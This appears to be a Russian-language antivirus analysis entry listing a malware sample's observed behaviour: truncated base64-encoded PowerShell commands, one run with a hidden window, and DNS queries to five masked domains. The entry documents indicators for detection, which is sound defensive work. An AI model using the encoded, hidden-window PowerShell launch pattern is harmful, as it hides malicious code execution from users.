Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGUAdABhAGwAYwBtAHAAPQAnAEMAbwBuAG4AZQBjAHQAaQBjAHUAdABsAHAAZAAnADsAJABGAGwAYQB0AGIAbwByACAAPQA...
- DNS ASK ma###ating.com
- DNS ASK th####songrp.com
- DNS ASK al###epsych.com
- DNS ASK mo##sim.com
- DNS ASK of###ekav.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAGUAdABhAGwAYwBtAHAAPQAnAEMAbwBuAG4AZQBjAHQAaQBjAHUAdABsAHAAZAAnADsAJABGAGwAYQB0AGIAbwByACAAPQA...' (со скрытым окном)